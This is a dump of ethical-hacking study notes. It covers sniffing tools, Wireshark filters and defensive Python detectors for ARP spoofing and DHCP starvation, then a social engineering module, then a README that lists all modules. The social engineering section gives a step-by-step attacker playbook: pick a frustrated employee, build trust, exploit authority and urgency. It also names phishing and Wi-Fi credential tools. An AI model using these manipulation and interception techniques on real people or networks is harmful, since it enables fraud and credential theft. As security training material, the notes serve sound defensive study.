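            hist.clear()           # one alert per burst rather than one per packet
    return alerts


def sample_arp() -> List[ArpReply]:
    """Constructed trace: two legitimate replies, then a host on Gi1/0/7 claiming the gateway's IP."""
    return [
        ArpReply(1.0, "10.0.0.1", "00:11:22:33:44:01", "Gi1/0/1"),
        ArpReply(2.0, "10.0.0.50", "00:11:22:33:44:50", "Gi1/0/5"),
        ArpReply(3.0, "10.0.0.1", "de:ad:be:ef:00:07", "Gi1/0/7"),   # poisoning attempt
        ArpReply(3.5, "10.0.0.99", "de:ad:be:ef:00:07", "Gi1/0/7"),  # unknown IP: no binding to compare
    ]


def sample_dhcp() -> List[DhcpMsg]:
    """Constructed trace: one normal DORA exchange, then eight DISCOVERs from eight MACs on one port."""
    normal = [
        DhcpMsg(0.0, "DHCPDISCOVER", "00:11:22:33:44:50", "Gi1/0/5"),
        DhcpMsg(0.1, "DHCPOFFER", "00:11:22:33:44:50", "Gi1/0/5"),
        DhcpMsg(0.2, "DHCPREQUEST", "00:11:22:33:44:50", "Gi1/0/5"),
        DhcpMsg(0.3, "DHCPACK", "00:11:22:33:44:50", "Gi1/0/5"),
    ]
    burst = [DhcpMsg(5.0 + i * 0.1, "DHCPDISCOVER", f"02:00:00:00:00:{i:02x}", "Gi1/0/9") for i in range(8)]
    return normal + burst


if __name__ == "__main__":
    for a in check_arp_replies(sample_arp(), TRUSTED_BINDINGS) + detect_dhcp_starvation(sample_dhcp()):
        print("ALERT:", a)
```

The ARP check only fires for IPs that have a trusted binding, which is exactly the limitation of DAI: hosts with static addresses need a static ARP ACL entry (the notes' second countermeasure) or they are never validated. The starvation threshold is per port on purpose; the same number of DISCOVERs spread over many ports is a normal morning.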
- ![ws](https://camo.githubusercontent.com/9a68907d89fefb9c1bcc0eae0c25c154c6868f62/68747470733a2f2f75706c6f61642e77696b696d656469612e6f72672f77696b6970656469612f636f6d6d6f6e732f302f30332f57697265736861726b5f73637265656e73686f742e706e67)
- Previously known as Ethereal
- Can be used to follow streams of data
- Can also filter the packets so you can find a specific type or a specific source address

- **Wireshark filters**:
  - **`!(arp or icmp or dns)`**
    - Filters out the "noise" from ARP, DNS and ICMP requests
    - **!** - Clears out the protocols for better inspection
  - **`tcp.port == 23`**
    - Look for **specific ports** using tcp.port
  - **`ip.addr == 10.0.0.165`**
    - Look for a specific **IP address**
  - **`ip.addr == 172.17.15.12 && tcp.port == 23`**
    - Displays telnet packets containing that IP
  - **`ip.src == 10.0.0.224 && ip.dst == 10.0.0.156`**
    - See all packets exchanged from the source IP to the destination IP
  - **`http.request`**
    - Displays HTTP GET requests
  - **`tcp contains string`**
    - Displays TCP segments that contain the word "string"
  - **`tcp.flags==0x16`**
    - Filters TCP requests with ACK flag set

### **tcpdump**
*Tcpdump is a data-network packet analyzer computer program that runs under a command line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.*
- ![tcpdump](https://camo.githubusercontent.com/33a479b12001431323304fb8a5f75ea65444357f/68747470733a2f2f7061636b6574666c6f77732e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30352f74637064756d705f692e706e67)
- **Syntax**
  - `tcpdump <flag(s)> <interface>`
  - `tcpdump -i eth1`
    - Puts the interface in listening mode
- WinDump is a Windows version similar to tcpdump.
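The matching rules behind the Wireshark filters listed above, written out as predicates over a small constructed capture so the semantics are explicit: `ip.addr` and `tcp.port` match either direction, `ip.src && ip.dst` matches one direction only and is not limited to TCP, `contains` is a byte-substring test on the segment, and `!(...)` removes whole protocols. This is an added example, not part of the original notes and not Wireshark's own filter engine; the packet records, addresses and payloads are constructed and the function names are this example's own.

```python
"""Wireshark display-filter semantics over a constructed capture.

Added example, not from the original notes. Packets, addresses and payloads are constructed.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class Packet:
    proto: str                      # highest-layer label as Wireshark shows it: arp, dns, icmp, tcp, http
    src: Optional[str] = None       # IP addresses; None for ARP, which has no IP layer
    dst: Optional[str] = None
    sport: Optional[int] = None
    dport: Optional[int] = None
    payload: bytes = b""            # TCP segment bytes
    http_request: bool = False      # True for an HTTP request line (GET/POST ...), False for responses


def has_tcp(p: Packet) -> bool:
    return p.proto in ("tcp", "http")        # HTTP packets still carry a TCP layer


def not_noise(p: Packet) -> bool:            # !(arp or icmp or dns)
    return p.proto not in ("arp", "icmp", "dns")


def tcp_port(p: Packet, port: int) -> bool:  # tcp.port == N matches source OR destination port
    return has_tcp(p) and port in (p.sport, p.dport)


def ip_addr(p: Packet, ip: str) -> bool:     # ip.addr == X matches source OR destination
    return ip in (p.src, p.dst)


def ip_src_dst(p: Packet, src: str, dst: str) -> bool:   # ip.src == A && ip.dst == B: one direction
    return p.src == src and p.dst == dst


def http_request(p: Packet) -> bool:         # http.request
    return p.http_request


def tcp_contains(p: Packet, needle: str) -> bool:        # tcp contains "needle": substring of the segment
    return has_tcp(p) and needle.encode() in p.payload


# Constructed capture: an ARP frame, a DNS query, a telnet login exchange, a ping, an HTTP GET and its reply.
CAPTURE: List[Packet] = [
    Packet("arp"),                                                                        # 0
    Packet("dns", "10.0.0.165", "10.0.0.1", 53000, 53),                                   # 1
    Packet("tcp", "10.0.0.165", "172.17.15.12", 51000, 23, b"login: admin\r\n"),          # 2 telnet, clear text
    Packet("tcp", "172.17.15.12", "10.0.0.165", 23, 51000, b"Password: "),                # 3
    Packet("icmp", "10.0.0.224", "10.0.0.156"),                                           # 4
    Packet("http", "10.0.0.224", "10.0.0.156", 52000, 80, b"GET /index.html HTTP/1.1\r\n", True),  # 5
    Packet("http", "10.0.0.156", "10.0.0.224", 80, 52000, b"HTTP/1.1 200 OK\r\n"),        # 6
]


def apply_filters(capture: List[Packet]) -> Dict[str, List[int]]:
    """Return, for each filter expression from the notes, the indexes of matching packets."""
    filters: Dict[str, Callable[[Packet], bool]] = {
        "!(arp or icmp or dns)": not_noise,
        "tcp.port == 23": lambda p: tcp_port(p, 23),
        "ip.addr == 10.0.0.165": lambda p: ip_addr(p, "10.0.0.165"),
        "ip.addr == 172.17.15.12 && tcp.port == 23": lambda p: ip_addr(p, "172.17.15.12") and tcp_port(p, 23),
        "ip.src == 10.0.0.224 && ip.dst == 10.0.0.156": lambda p: ip_src_dst(p, "10.0.0.224", "10.0.0.156"),
        "http.request": http_request,
        'tcp contains "login"': lambda p: tcp_contains(p, "login"),
    }
    return {name: [i for i, p in enumerate(capture) if f(p)] for name, f in filters.items()}


if __name__ == "__main__":
    for name, hits in apply_filters(CAPTURE).items():
        print(f"{name:48s} -> packets {hits}")
```

Packet 4 (the ping) is why `ip.src && ip.dst` is broader than it looks: it matches at the IP layer, so anything between the two hosts shows up, not just the HTTP session.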
### **tcptrace**
- Analyzes files produced by packet capture programs such as Wireshark, tcpdump and Etherpeek

### **Other Tools**
- **Ettercap** - can also be used for MITM attacks and ARP poisoning. Has active and passive sniffing.
- **Capsa Network Analyzer**
- **Snort** - usually discussed as an Intrusion Detection application
- **Sniff-O-Matic**
- **EtherPeek**
- **WinDump**
- **WinSniffer**

## **Defending and Countermeasures techniques against Sniffing**:
- Disable dynamic ARP
- ARP spoofing detection tools
- Encrypt all the traffic that leaves your system
- Avoid public Wi-Fi spots
- Network scanning and monitoring
- Reverse DNS lookups in logs == sniffer
- **Ping** suspect clients with a **wrong MAC address**
  - If the suspect accepts the packet, it is a good indication that it is sniffing the network / using its NIC in promiscuous mode.
- Use **Nmap** with the NSE script for **Sniffer Detect**:
  - **`nmap --script=sniffer-detect `**

--------------------------------------------------------------------------------
/9-Social-Engineering.md:
--------------------------------------------------------------------------------

# Social Engineering

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/8-Social-Engineering)**

*Social Engineering is the art of manipulating a person or group into providing information or a service they would otherwise not have given.*

## Phases
1. 🔍 **Research target company**
   - Dumpster dive, visit websites, tour the company, etc.
2. 🎯 **Select the victim**
   - Identify a frustrated employee or other target
3. 💬 **Build a relationship**
   - Develop a relationship with the target employee
4. 💰 **Exploit the relationship**
   - Collect sensitive information and current technologies

## Principles
1. **Authority**
   * Impersonate or imply a position of authority
2. **Intimidation**
   * Frighten by threat
3. **Consensus / Social proof**
   * To convince of a general group agreement
4. **Scarcity**
   * The situation will not be this way for long
5. **Urgency**
   * Works alongside scarcity / act quickly, don't think
6. **Familiarity**
   * To imply a closer relationship
7. **Trust**
   * To assure reliance on their honesty and integrity

## **Behaviors**
- **Human nature/Trust** - trusting others
- **Ignorance** of social engineering efforts
- **Fear** of consequences of not providing the information
- **Greed** - promised gain for providing requested information
- A sense of **moral obligation**

## **Companies Common Risks:**
- **Insufficient training**
- **Lack of controls**
  - Technical
    - e.g. Firewall rules, ACL rules, patch management (...)
  - Administrative
    - e.g. Mandatory Vacations, Job Rotation, Separation of Duties (...)
  - Physical
    - e.g. Proper Lighting, Cameras, Guards, Mantraps (...)
- **Size of the Company Matters**
- **Lack of Policies**
  - Promiscuous Policy
  - Permissive Policy
  - Prudent Policy
  - Paranoid Policy

## Social Engineering Attacks:

## Human-Based Attacks 👥

- **Dumpster Diving** - Looking for sensitive information in the trash
  - Shredded papers can sometimes indicate sensitive info

- **Impersonation** - Pretending to be someone you're not
  - Can be anything from a help desk person up to an authoritative figure (FBI agent)
  - Posing as a tech support professional can very quickly gain trust with a person

- **Shoulder Surfing** - Looking over someone's shoulder to get info
  - Can be done from long distance with binoculars, etc.

- **Eavesdropping** - Listening in on conversations about sensitive information

- **Tailgating** - Attacker walks in behind someone who has a valid badge (e.g. holding boxes or simply following without being noticed)

- **Piggybacking** - Attacker pretends they lost their badge and asks someone to hold the door

- **RFID Identity Theft** (RFID skimming) - Stealing an RFID card signature with a specialized device

- **Reverse Social Engineering** - Getting someone to call you and give information
  - Often happens with tech support - an email is sent to the user stating they need to call back (due to a technical issue) and the user calls back
  - Can also be combined with a DoS attack to cause a problem that the user would need to call about
  - Always be pleasant - it gets more information

- **Insider Attack** - An attack from an employee, generally disgruntled
  - Sometimes subclassified (negligent insider, professional insider)

## Computer-Based Attacks 💻
*Can begin with sites like Facebook where information about a person is available; for instance, if you know Bob is working on a project, an email crafted to him about that project would seem quite normal if you spoof it from a person on his project.*

- **Phishing** - crafting an email that appears legitimate but contains links to fake websites or to download malicious content.

- **Ways to Avoid Phishing**
  - Beware unknown, unexpected or suspicious originators
  - Beware of who the email is addressed to
  - Verify phone numbers
  - Beware bad spelling or grammar
  - Always check links

- **Spear Phishing** - Targeting a person or a group with a phishing attack.
  - Can be more useful because the attack can be targeted

- **Whaling** - Going after **CEOs** or other **C-level executives**.

- **Pharming** - Redirects a user's traffic to a clone website; may use DNS poisoning.

- **Spamming** - Sending spam over instant message.

- **Fake Antivirus** - Very prevalent attack; pretends to be an anti-virus but is a malicious tool.

### **Tools**
- **SET (Social Engineering Toolkit)** - Pentest tool designed to perform advanced attacks against humans by exploiting their behavior.

- **PhishTank** - For phishing detection

- **Wifiphisher** - Automated phishing attacks against Wi-Fi networks in order to obtain credentials or inject malware.

- **SPF SpeedPhish framework** - Quick recon and deployment of simple social engineering exercises

## Mobile-Based Attacks

- **ZitMo** (ZeuS-in-the-Mobile) - banking malware that was ported to Android
  - SMS messages can be sent to request premium services
- **Attacks**
  - Publishing malicious apps
  - Repackaging legitimate apps
  - Fake security applications
  - SMS (**smishing**)

## Physical Security Basics

- **Physical measures** - everything you can touch, taste, smell or get shocked by
  - Includes things like air quality, power concerns, humidity-control systems
- **Technical measures** - smartcards and biometrics
- **Operational measures** - policies and procedures you set up to enforce a security-minded operation
- **Access controls** - physical measures designed to prevent access to controlled areas
- **Biometrics** - measures taken for authentication that come from the "something you are" concept
  - **False rejection rate** (FRR) - when a biometric rejects a valid user
  - **False acceptance rate** (FAR) - when a biometric accepts an invalid user
  - **Crossover error rate** (CER) - combination of the two; determines how good a system is
- Even though hackers normally don't worry about environmental disasters, this is something to think of from a pen test standpoint (hurricanes, tornadoes, floods, etc.)

## Prevention
- Separation of duties
- Rotation of duties
- Controlled Access
- Least privilege
- Logging & Auditing
- Policies

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# HACKING GUIDE

HACKING GUIDE is a collection of hacking guide books.
### DESCRIPTION
HACKING GUIDE is a comprehensive resource for aspiring ethical hackers, providing step-by-step tutorials and tools to enhance cybersecurity knowledge. This guide equips users with essential skills to understand and mitigate potential security risks. HACKING GUIDE covers various aspects of ethical hacking, including penetration testing, vulnerability analysis, and network security. Users can explore practical demonstrations and gain insights into the latest cybersecurity techniques. It's important to note that HACKING GUIDE is designed for educational purposes, promoting ethical hacking practices and adhering to strict ethical standards. The guide emphasizes responsible and legal use of hacking knowledge to strengthen digital defenses and protect against potential threats.

1. [Module 01 - Introduction to Ethical Hacking](https://github.com/0xbitx/Hacking-guide/blob/master/1-Introduction.md)
2. [Module 02 - Footprinting and Reconnaissance](https://github.com/0xbitx/Hacking-guide/blob/master/2-Footprinting-and-Reconnaissance.md)
3. [Module 03 - Scanning Networks](https://github.com/0xbitx/Hacking-guide/blob/master/3-Scanning-Networks.md)
4. [Module 04 - Enumeration](https://github.com/0xbitx/Hacking-guide/blob/master/2-Scanning-and-Enumeration.md)
5. [Module 05 - Vulnerability Analysis](https://github.com/0xbitx/Hacking-guide/blob/main/5-Vulnerability-Analysis.md)
6. [Module 06 - System Hacking](https://github.com/0xbitx/Hacking-guide/blob/master/6-System-Hacking.md)
7. [Module 07 - Malware Threats](https://github.com/0xbitx/Hacking-guide/blob/master/7-Malware.md)
8. [Module 08 - Sniffing](https://github.com/0xbitx/Hacking-guide/blob/master/8-Sniffing.md)
9. [Module 09 - Social Engineering](https://github.com/0xbitx/Hacking-guide/blob/master/9-Social-Engineering.md)
10. [Module 10 - Denial of Service](https://github.com/0xbitx/Hacking-guide/blob/master/10-Denial-of-Service.md)
11. [Module 11 - Session Hijacking](https://github.com/0xbitx/Hacking-guide/blob/master/11-Session-Hijacking.md)
12. [Module 12 - Evading IDS, Firewalls, and Honeypots](https://github.com/0xbitx/Hacking-guide/blob/master/12-Evading-IDS-Firewalls-and-Honeypots.md)
13. [Module 13 - Hacking Web Servers](https://github.com/0xbitx/Hacking-guide/blob/master/13-Hacking-Web-Servers.md)
14. [Module 14 - Hacking Web Applications](https://github.com/0xbitx/Hacking-guide/blob/master/14-Hacking-Web-Applications.md)
15. [Module 15 - SQL Injection](https://github.com/0xbitx/Hacking-guide/blob/master/14-Pentesting.md)
16. [Module 16 - Hacking Wireless Networks](https://github.com/0xbitx/Hacking-guide/blob/master/16-Hacking-Wireless-Networks.md)
17. [Module 17 - Hacking Mobile Platforms](https://github.com/0xbitx/Hacking-guide/blob/master/17-Hacking-Mobile-Platforms-and-IoT.md)
18. [Module 18 - Hacking IoT and OT](https://github.com/0xbitx/Hacking-guide/blob/master/17-Hacking-Mobile-Platforms-and-IoT.md)
19. [Module 19 - Cloud Computing](https://github.com/0xbitx/Hacking-guide/blob/master/19-Cloud%20Computing.md)
20. [Module 20 - Cryptography](https://github.com/0xbitx/Hacking-guide/blob/master/20-Cryptography.md)

## Support

If you find my work helpful and want to support me, consider making a donation. Your contribution will help me continue working on open-source projects.

**Bitcoin Address: `36ALguYpTgFF3RztL4h2uFb3cRMzQALAcm`**